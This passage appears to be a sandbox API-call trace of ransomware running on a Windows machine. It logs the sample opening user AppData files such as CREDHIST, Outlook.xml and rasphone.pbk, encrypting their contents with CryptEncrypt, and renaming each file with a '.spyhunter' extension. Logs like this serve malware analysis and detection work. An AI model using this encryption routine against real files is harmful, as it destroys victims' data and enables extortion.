HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0139.671] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned 152 [0139.671] StrStrW (lpFirst="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpSrch=".txt") returned 0x0 [0139.671] GetProcessHeap () returned 0x2c0000 [0139.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0139.671] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f24c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f24c*=0x18e, lpOverlapped=0x0) returned 1 [0139.672] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffe72, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.672] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x18e, lpNumberOfBytesWritten=0x57f24c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f24c*=0x18e, lpOverlapped=0x0) returned 1 [0139.672] GetProcessHeap () returned 0x2c0000 [0139.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0139.672] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.672] WriteFile (in: hFile=0x178, lpBuffer=0x57f28c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f24c, lpOverlapped=0x0 | out: lpBuffer=0x57f28c*, lpNumberOfBytesWritten=0x57f24c*=0x4, lpOverlapped=0x0) returned 1 [0139.673] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f24c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f24c*=0x30, lpOverlapped=0x0) returned 1 [0139.673] CloseHandle (hObject=0x178) returned 1 [0139.673] GetProcessHeap () returned 0x2c0000 [0139.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0139.673] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585.spyhunter") returned 162 [0139.673] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585.spyhunter")) returned 1 [0139.673] GetProcessHeap () returned 0x2c0000 [0139.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0139.674] GetProcessHeap () returned 0x2c0000 [0139.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0139.674] GetProcessHeap () returned 0x2c0000 [0139.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fed458 | out: hHeap=0x2c0000) returned 1 [0139.903] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f278 | out: pbBuffer=0x57f278) returned 1 [0139.903] GetProcessHeap () returned 0x2c0000 [0139.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0139.903] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f270*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f270*=0x30) returned 1 [0139.903] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\rasphone.pbk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0139.904] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk") returned 107 [0139.904] StrStrW (lpFirst="rasphone.pbk", lpSrch=".txt") returned 0x0 [0139.904] GetProcessHeap () returned 0x2c0000 [0139.904] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0139.904] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f234, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f234*=0x0, lpOverlapped=0x0) returned 1 [0139.904] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.904] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x57f234, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f234*=0x0, lpOverlapped=0x0) returned 1 [0139.904] GetProcessHeap () returned 0x2c0000 [0139.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0139.904] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.904] WriteFile (in: hFile=0xec, lpBuffer=0x57f274*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f234, lpOverlapped=0x0 | out: lpBuffer=0x57f274*, lpNumberOfBytesWritten=0x57f234*=0x4, lpOverlapped=0x0) returned 1 [0139.905] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f234, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f234*=0x30, lpOverlapped=0x0) returned 1 [0139.905] CloseHandle (hObject=0xec) returned 1 [0139.905] GetProcessHeap () returned 0x2c0000 [0139.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f6eda0 [0139.906] wnsprintfW (in: pszDest=0x2f6eda0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk.spyhunter") returned 117 [0139.906] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\rasphone.pbk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\rasphone.pbk.spyhunter")) returned 1 [0139.906] GetProcessHeap () returned 0x2c0000 [0139.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6eda0 | out: hHeap=0x2c0000) returned 1 [0139.906] GetProcessHeap () returned 0x2c0000 [0139.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0139.907] GetProcessHeap () returned 0x2c0000 [0139.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc1080 | out: hHeap=0x2c0000) returned 1 [0139.910] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f268 | out: pbBuffer=0x57f268) returned 1 [0139.910] GetProcessHeap () returned 0x2c0000 [0139.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0139.910] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f260*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f260*=0x30) returned 1 [0139.911] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\1033\\global.mpt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0139.911] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT") returned 89 [0139.911] StrStrW (lpFirst="Global.MPT", lpSrch=".txt") returned 0x0 [0139.911] GetProcessHeap () returned 0x2c0000 [0139.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0139.911] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f224, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f224*=0x2800, lpOverlapped=0x0) returned 1 [0140.017] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.017] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f224, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f224*=0x2800, lpOverlapped=0x0) returned 1 [0140.018] GetProcessHeap () returned 0x2c0000 [0140.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0140.018] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.018] WriteFile (in: hFile=0xec, lpBuffer=0x57f264*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f224, lpOverlapped=0x0 | out: lpBuffer=0x57f264*, lpNumberOfBytesWritten=0x57f224*=0x4, lpOverlapped=0x0) returned 1 [0140.136] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f224, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f224*=0x30, lpOverlapped=0x0) returned 1 [0140.136] CloseHandle (hObject=0xec) returned 1 [0140.152] GetProcessHeap () returned 0x2c0000 [0140.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0140.152] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT.spyhunter") returned 99 [0140.152] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\1033\\global.mpt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\1033\\global.mpt.spyhunter")) returned 1 [0140.153] GetProcessHeap () returned 0x2c0000 [0140.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0140.153] GetProcessHeap () returned 0x2c0000 [0140.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0140.153] GetProcessHeap () returned 0x2c0000 [0140.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f46828 | out: hHeap=0x2c0000) returned 1 [0140.153] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f260 | out: pbBuffer=0x57f260) returned 1 [0140.153] GetProcessHeap () returned 0x2c0000 [0140.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0140.154] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f258*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f258*=0x30) returned 1 [0140.154] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\credhist"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0140.154] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 76 [0140.154] StrStrW (lpFirst="CREDHIST", lpSrch=".txt") returned 0x0 [0140.154] GetProcessHeap () returned 0x2c0000 [0140.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0140.154] ReadFile (in: hFile=0xec, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f21c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f21c*=0x138, lpOverlapped=0x0) returned 1 [0140.155] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffec8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.155] WriteFile (in: hFile=0xec, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x138, lpNumberOfBytesWritten=0x57f21c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f21c*=0x138, lpOverlapped=0x0) returned 1 [0140.155] GetProcessHeap () returned 0x2c0000 [0140.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0140.156] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.156] WriteFile (in: hFile=0xec, lpBuffer=0x57f25c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f21c, lpOverlapped=0x0 | out: lpBuffer=0x57f25c*, lpNumberOfBytesWritten=0x57f21c*=0x4, lpOverlapped=0x0) returned 1 [0140.156] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f21c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f21c*=0x30, lpOverlapped=0x0) returned 1 [0140.156] CloseHandle (hObject=0xec) returned 1 [0140.156] GetProcessHeap () returned 0x2c0000 [0140.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0140.156] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.spyhunter") returned 86 [0140.156] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\credhist"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\credhist.spyhunter")) returned 1 [0140.157] GetProcessHeap () returned 0x2c0000 [0140.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0140.157] GetProcessHeap () returned 0x2c0000 [0140.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0140.157] GetProcessHeap () returned 0x2c0000 [0140.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2f300 | out: hHeap=0x2c0000) returned 1 [0140.158] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f260 | out: pbBuffer=0x57f260) returned 1 [0140.158] GetProcessHeap () returned 0x2c0000 [0140.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0140.158] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f258*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f258*=0x30) returned 1 [0140.158] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.158] GetProcessHeap () returned 0x2c0000 [0140.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0140.158] GetProcessHeap () returned 0x2c0000 [0140.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c81c00 | out: hHeap=0x2c0000) returned 1 [0140.158] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f258 | out: pbBuffer=0x57f258) returned 1 [0140.158] GetProcessHeap () returned 0x2c0000 [0140.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0140.158] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f250*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f250*=0x30) returned 1 [0140.158] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.159] GetProcessHeap () returned 0x2c0000 [0140.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0140.159] GetProcessHeap () returned 0x2c0000 [0140.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c80e80 | out: hHeap=0x2c0000) returned 1 [0140.162] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f248 | out: pbBuffer=0x57f248) returned 1 [0140.162] GetProcessHeap () returned 0x2c0000 [0140.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0140.163] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f240*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f240*=0x30) returned 1 [0140.163] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0140.163] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml") returned 79 [0140.163] StrStrW (lpFirst="Outlook.xml", lpSrch=".txt") returned 0x0 [0140.163] GetProcessHeap () returned 0x2c0000 [0140.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0140.164] ReadFile (in: hFile=0xec, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f204, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f204*=0x9a2, lpOverlapped=0x0) returned 1 [0140.340] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffff65e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.341] WriteFile (in: hFile=0xec, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x9a2, lpNumberOfBytesWritten=0x57f204, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f204*=0x9a2, lpOverlapped=0x0) returned 1 [0140.341] GetProcessHeap () returned 0x2c0000 [0140.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0140.341] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.341] WriteFile (in: hFile=0xec, lpBuffer=0x57f244*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f204, lpOverlapped=0x0 | out: lpBuffer=0x57f244*, lpNumberOfBytesWritten=0x57f204*=0x4, lpOverlapped=0x0) returned 1 [0140.341] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f204, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f204*=0x30, lpOverlapped=0x0) returned 1 [0140.341] CloseHandle (hObject=0xec) returned 1 [0140.341] GetProcessHeap () returned 0x2c0000 [0140.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0140.341] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml.spyhunter") returned 89 [0140.341] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.xml"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.xml.spyhunter")) returned 1 [0140.342] GetProcessHeap () returned 0x2c0000 [0140.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0140.342] GetProcessHeap () returned 0x2c0000 [0140.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0140.342] GetProcessHeap () returned 0x2c0000 [0140.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2f218 | out: hHeap=0x2c0000) returned 1 [0140.342] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f248 | out: pbBuffer=0x57f248) returned 1 [0140.343] GetProcessHeap () returned 0x2c0000 [0140.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0140.343] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f240*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f240*=0x30) returned 1 [0140.343] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player (2).lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0140.343] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk") returned 139 [0140.343] StrStrW (lpFirst="Windows Media Player (2).lnk", lpSrch=".txt") returned 0x0 [0140.343] GetProcessHeap () returned 0x2c0000 [0140.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0140.343] ReadFile (in: hFile=0xec, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f204, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f204*=0x60b, lpOverlapped=0x0) returned 1 [0140.344] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffff9f5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.344] WriteFile (in: hFile=0xec, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x60b, lpNumberOfBytesWritten=0x57f204, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f204*=0x60b, lpOverlapped=0x0) returned 1 [0140.344] GetProcessHeap () returned 